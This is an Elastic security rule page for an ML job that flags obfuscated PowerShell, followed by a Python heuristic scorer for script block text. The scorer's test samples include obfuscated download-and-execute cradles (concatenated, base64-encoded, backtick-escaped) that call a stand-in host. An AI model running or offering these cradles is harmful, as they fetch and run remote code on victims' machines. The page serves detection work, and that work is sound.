Suspicious Powershell Script

A machine learning job detected a PowerShell script block whose text has unusual characteristics, such as obfuscation, that are often a sign of malicious PowerShell.

Rule type: machine_learning

Machine learning job: windows_anomalous_script

Machine learning anomaly threshold: 50

Severity: low

Risk score: 21

Runs every: 15 minutes

Searches indices from: now-45m (Date Math format, see also Additional look-back time)

Maximum signals per execution: 100

References:

Tags:

  • Elastic
  • ML
  • Windows

Version: 1

Added (Elastic Stack release): 7.7.0

Potential false positives

Certain kinds of security testing may trigger this signal, as may legitimate PowerShell scripts that use high levels of obfuscation or carry unusual script block payloads.
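The rule page does not say which text characteristics the job weighs, so when triaging a signal it helps to see for yourself what makes a script block look unusual. The following Python scorer is an added example, not Elastic's windows_anomalous_script model and not code from this page: it runs a handful of hand-picked obfuscation indicators (backtick escapes, string concatenation of command names, the call operator applied to a string, -EncodedCommand payloads, long base64 tokens, a high special-character ratio) over constructed sample script blocks. The indicator names, thresholds and samples are the author's assumptions; the input is assumed to be script block text such as PowerShell Script Block Logging records (event ID 4104).

```python
"""Heuristic obfuscation scorer for PowerShell script block text.

Added example: NOT the Elastic windows_anomalous_script model. It reports a
few hand-picked indicators (assumed thresholds, not taken from the rule) so
an analyst can see why a script block looks unusual during triage.
"""
import base64
import math
import re
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Bits per character; reported for context, not used in the score."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def special_ratio(text: str) -> float:
    """Share of characters that are neither alphanumeric nor whitespace."""
    if not text:
        return 0.0
    return sum(1 for c in text if not (c.isalnum() or c.isspace())) / len(text)


# Indicator name -> predicate. Thresholds are assumptions for illustration.
INDICATORS = [
    ("backtick_escapes", lambda t: t.count("`") >= 3),
    ("string_concatenation", lambda t: len(re.findall(r"""['"]\s*\+\s*['"]""", t)) >= 2),
    ("call_operator_on_string", lambda t: re.search(r"""&\s*\(\s*['"]""", t) is not None),
    ("encoded_command", lambda t: re.search(
        r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", t, re.I) is not None),
    ("long_base64_token", lambda t: re.search(r"[A-Za-z0-9+/]{60,}", t) is not None),
    ("high_special_char_ratio", lambda t: special_ratio(t) > 0.35),
]


def assess(script_block: str) -> dict:
    """Return the indicators hit plus two continuous features for context."""
    hits = [name for name, check in INDICATORS if check(script_block)]
    return {
        "score": len(hits),
        "indicators": hits,
        "entropy": round(shannon_entropy(script_block), 2),
        "special_ratio": round(special_ratio(script_block), 2),
    }


def _encoded(cmd: str) -> str:
    """-EncodedCommand takes the base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample script blocks (not real telemetry).
SAMPLES = {
    "benign_admin": 'Get-Service | Where-Object { $_.Status -eq "Running" } | Sort-Object DisplayName',
    "benign_install": "Install-WindowsFeature -Name Web-Server -IncludeManagementTools",
    "obfuscated_concat": "&('I'+'nvo'+'ke-Ex'+'pression') (('Ne'+'w-Ob'+'ject') + ' Net.WebClient')",
    "obfuscated_encoded": "powershell -NoP -W Hidden -EncodedCommand "
    + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"),
    "obfuscated_backticks": 'i`e`x (n`e`w-o`b`j`e`c`t n`e`t.w`e`b`c`l`i`e`n`t)'
    '.d`o`w`n`l`o`a`d`s`t`r`i`n`g("http://example.com/a")',
}


def triage(samples: dict = SAMPLES, min_score: int = 2) -> dict:
    """Map each sample name to its assessment plus a 'suspicious' verdict."""
    out = {}
    for name, text in samples.items():
        result = assess(text)
        result["suspicious"] = result["score"] >= min_score
        out[name] = result
    return out


if __name__ == "__main__":
    for name, r in triage().items():
        print(f"{name:22s} score={r['score']} suspicious={r['suspicious']} "
              f"entropy={r['entropy']} specials={r['special_ratio']} {r['indicators']}")
```

Run it as a script to see the per-sample breakdown; the two benign blocks hit no indicator while each obfuscated block hits at least two. The point of the design is that each indicator is named, so the reason a block is flagged is explainable during triage; the ML job itself is opaque, and a heuristic like this is only a companion check, never a replacement for reviewing the actual script block text.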